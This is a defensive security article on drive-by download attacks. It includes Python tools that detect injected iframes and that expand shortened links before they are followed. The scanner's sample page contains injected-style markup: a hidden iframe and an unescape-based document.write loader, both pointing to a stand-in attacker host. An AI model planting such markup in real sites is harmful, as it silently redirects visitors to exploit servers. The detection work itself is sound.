Defending against drive-by downloads
by Corey Nachreiner - Director of Security Strategy at WatchGuard - Monday, 3 February 2014.
Attackers search popular, legitimate web sites for web application vulnerabilities, such as SQL injection (SQLi) and cross-site scripting (XSS) flaws, then exploit those flaws to inject malicious code into the legitimate site. The injected code, typically a hidden iframe or script tag, silently redirects anyone who visits the site to a server hosting the drive-by download (DbD) exploit code.
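To make this concrete, here is an added example (not code from the article or from WatchGuard) that scans a fetched HTML page for the markers such injections usually leave behind: hidden iframes pointing off-site, inline scripts that decode and write markup at runtime, and script tags loaded from hosts other than the page's own. The page, its URL and the hostnames in it are constructed for the example; a real site's list of expected third-party script hosts would have to be supplied by its owner.

```python
"""Flag injected drive-by redirect markers in an HTML page (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse


class _PageCollector(HTMLParser):
    """Collect <iframe> attributes and <script> tags (attributes plus inline body)."""

    def __init__(self):
        super().__init__()
        self.iframes = []      # list of attribute dicts
        self.scripts = []      # list of {"attrs": dict, "body": str}
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            self.iframes.append(attrs)
        elif tag == "script":
            self.scripts.append({"attrs": attrs, "body": ""})
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts[-1]["body"] = "".join(self._buf)
            self._in_script = False


# Loader idioms common in injected code: writing or evaluating decoded strings,
# or assembling code from character codes.
OBFUSCATION = re.compile(
    r"(?:document\.write|eval)\s*\(\s*unescape\s*\(|String\.fromCharCode", re.I)
IFRAME_SRC = re.compile(r"<iframe[^>]*\ssrc=[\"']?([^\"'\s>]+)", re.I)


def _is_hidden(attrs):
    """Zero/one-pixel frames or CSS-hidden frames are invisible to the visitor."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = any(attrs.get(k, "").strip().rstrip("px") in ("0", "1")
               for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


def _is_offsite(url, page_host):
    host = urlparse(url).hostname
    if not host:                      # relative URL: same origin as the page
        return False
    return host != page_host and not host.endswith("." + page_host)


def scan_page(html, page_url):
    """Return a list of (finding, detail) tuples for suspicious content."""
    page_host = urlparse(page_url).hostname or ""
    collector = _PageCollector()
    collector.feed(html)
    collector.close()
    findings = []

    for frame in collector.iframes:
        src = frame.get("src", "")
        if _is_hidden(frame) and _is_offsite(src, page_host):
            findings.append(("hidden-offsite-iframe", src))

    for script in collector.scripts:
        src = script["attrs"].get("src", "")
        if src and _is_offsite(src, page_host):
            # Low severity on its own (CDNs are common); compare against known hosts.
            findings.append(("offsite-script", src))
        body = script["body"]
        if OBFUSCATION.search(body):
            findings.append(("obfuscated-script", body[:60].strip()))
        # Percent-decode the body and look for markup hidden inside the string.
        decoded = unquote(body)
        if decoded != body:
            for match in IFRAME_SRC.finditer(decoded):
                findings.append(("decoded-iframe", match.group(1)))
    return findings


# Constructed sample page, not captured from any real site. The first iframe and
# the inline script are the kind of markup injected after an SQLi/XSS compromise;
# the last iframe is an ordinary embedded map.
SAMPLE_URL = "http://gardening-club.example.com/news.html"
SAMPLE_HTML = """<html><head><title>Gardening Club News</title>
<script src="/js/site.js"></script>
<script src="https://cdn.example.net/jquery.min.js"></script>
</head><body>
<h1>Meeting notes</h1>
<iframe src="http://evil-example.test/in.php" width="0" height="0"
        style="visibility: hidden"></iframe>
<script>document.write(unescape('%3Ciframe src=%22http://evil-example.test/x.html%22 style=%22display:none%22%3E%3C/iframe%3E'));</script>
<iframe src="https://maps.example.org/embed?q=garden" width="400" height="300"></iframe>
</body></html>"""


def scan_sample():
    return scan_page(SAMPLE_HTML, SAMPLE_URL)


if __name__ == "__main__":
    for kind, detail in scan_sample():
        print(f"{kind:24} {detail}")
```

Run against the sample, the scanner reports the hidden off-site iframe, the obfuscated inline script together with the iframe it decodes to, and the off-site script host, while the visible map embed is left alone. Hidden iframes and `document.write(unescape(...))` loaders are strong signals; an off-site script host is only a lead to check against the site's known third-party dependencies.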

In the past, I could warn you against visiting sordid web sites to avoid DbD attacks. Today, however, any site on the Internet, even the ones you trust the most, may have been hijacked and could be hiding a drive-by download.

Part of being a good spy is understanding your adversary's techniques, and then learning the tradecraft that can protect you in the field. Now that you know what a drive-by download is and how it works, here are a few cyber tradecraft tips that will protect you online:

Patch, patch, and then patch some more: In "computer-ese," patching means applying the latest updates to your software. As mentioned, web sites can't forcibly download software to your computer unless they can take advantage of programming flaws in the software you run. Many of the DbD attacks seen in the wild exploit flaws that vendors have already fixed, so if you keep your software up to date, most of these attacks will fail. Obviously patch your web browser, but also know that attackers have lately been focusing on Java and Flash vulnerabilities. Patch these packages just as aggressively as the browser itself; in fact, I recommend disabling the Java browser plugin entirely if you can.

Don't click unsolicited links: Simply put, avoid clicking unsolicited links sent to you via email and IM. I probably can't convince you not to click on links from your friends (or ones that seem to come from your friends), but at least remain wary of them, and look at the URL behind the link before clicking it. Be careful around shortened links, too, and use tools to expand and preview them before following them. Here's a quick tip: for bit.ly links, adding a "+" character to the end of the link shows you a preview page with the actual destination URL before you visit it.
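The following added example (not the article's or WatchGuard's code) shows how to triage links in a message the way the tip describes: pull out the URLs, flag ones on known shortener hosts, build the preview URL where a shortener offers one (bit.ly's trailing "+", and tinyurl.com's preview. subdomain), and walk the redirect chain one hop at a time without letting the client auto-follow it, so you see every intermediate host before the final landing page. The shortener host list and the sample message are assumptions made for the example, and the redirect table is constructed so the demonstration runs offline; `http_head_location` is the real network version you would plug in instead.

```python
"""Expand and preview shortened links before following them (added example)."""
import re
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlparse

# Assumed list of common shortener hosts; extend for your environment.
SHORTENER_HOSTS = {"bit.ly", "bitly.com", "t.co", "goo.gl", "tinyurl.com",
                   "ow.ly", "is.gd"}
URL_RE = re.compile(r"https?://[^\s<>\"')\]]+")


def extract_urls(text):
    return URL_RE.findall(text)


def is_shortener(url):
    return (urlparse(url).hostname or "").lower() in SHORTENER_HOSTS


def preview_url(url):
    """Return a preview URL for shorteners that offer one, else None."""
    host = (urlparse(url).hostname or "").lower()
    if host in ("bit.ly", "bitly.com"):
        return url.split("?")[0] + "+"          # bit.ly: trailing "+" shows the target
    if host == "tinyurl.com":
        return url.replace("tinyurl.com", "preview.tinyurl.com", 1)
    return None


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib raise on 3xx instead of silently following the redirect."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def http_head_location(url, timeout=5):
    """One HEAD request; return its Location header, or None if not a redirect."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout):
            return None                       # 2xx: this is the final destination
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.headers.get("Location")
        raise


def resolve_chain(url, fetch_location=http_head_location, max_hops=10):
    """Follow redirects one hop at a time; stop on loop or hop limit."""
    chain, seen = [url], {url}
    for _ in range(max_hops):
        nxt = fetch_location(chain[-1])
        if nxt is None:
            return chain, "final"
        nxt = urljoin(chain[-1], nxt)         # Location may be relative
        chain.append(nxt)
        if nxt in seen:
            return chain, "loop"
        seen.add(nxt)
    return chain, "too-many-hops"


def triage_message(text, fetch_location=http_head_location):
    """For each URL in a message, report shortener status, preview and redirect chain."""
    report = []
    for url in extract_urls(text):
        chain, status = resolve_chain(url, fetch_location)
        report.append({
            "url": url,
            "shortener": is_shortener(url),
            "preview": preview_url(url),
            "chain": chain,
            "hops": len(chain) - 1,
            "status": status,
            "final": chain[-1],
            "final_host": urlparse(chain[-1]).hostname,
        })
    return report


# Constructed redirect table standing in for the network (hostnames are made up).
FAKE_REDIRECTS = {
    "http://bit.ly/3xmpl": "http://tinyurl.com/y2xmpl",
    "http://tinyurl.com/y2xmpl": "http://promo.example.net/go?id=7",
    "http://promo.example.net/go?id=7": "http://evil-example.test/landing.html",
    "http://loop.example.net/a": "/b",
    "http://loop.example.net/b": "/a",
}


def fake_head_location(url):
    return FAKE_REDIRECTS.get(url)


# Constructed sample message from a "friend".
SAMPLE_MESSAGE = ("Hey, photos from Saturday: http://bit.ly/3xmpl "
                  "and the minutes are on http://wiki.example.org/minutes")


if __name__ == "__main__":
    for item in triage_message(SAMPLE_MESSAGE, fetch_location=fake_head_location):
        print(item["url"], "->", " -> ".join(item["chain"][1:]) or "(no redirect)",
              f"[{item['status']}]")
```

The bit.ly link in the sample bounces through two more hosts before landing on the final domain, which is the part a preview of only the first hop would miss. The hop limit and loop detection matter in practice: a redirect loop or an endless chain is itself a sign the link is not what it claims to be.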

Use antivirus (AV) and intrusion prevention (IPS): While vigilance and good practices help you avoid many attacks, no one is perfect; there will be a day when even the best of us stumbles onto a DbD attack site. IPS systems can frequently detect the network exploits these attacks use, and AV systems can often recognize the malicious payloads they try to silently download. Use AV and IPS, and keep their signatures up to date.

Use reputation-based web-filtering solutions: The malicious sites that serve DbD attacks change quite frequently, as do the legitimate sites that have been hijacked. Security organizations and vendors, like WatchGuard, use many automated techniques to track the latest malware-distributing sites, and offer reputation services that keep you and your users away from them. Consider using a web-filtering solution to help you avoid dangerous sites on the Internet.

Pro-tip: Limit web-based scripting with NoScript (and others): Without going into all the technical details, many DbD attacks rely on client-side scripting and active content, such as JavaScript and ActiveX, to carry out their attacks. Disabling these technologies would block the vast majority of DbD attacks. Unfortunately, it's not quite that simple: many legitimate web sites also use them for perfectly normal features. That's why I recommend script whitelisting tools like Firefox's NoScript or Chrome's NotScripts, or the browser's built-in Click-to-Play setting for plugins. These block scripts and plugin content by default, but let you easily whitelist the sites you trust.
